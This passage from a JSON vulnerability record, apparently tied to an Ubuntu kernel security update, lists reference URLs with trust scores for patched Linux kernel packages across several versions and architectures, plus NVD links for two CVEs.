        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0006"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
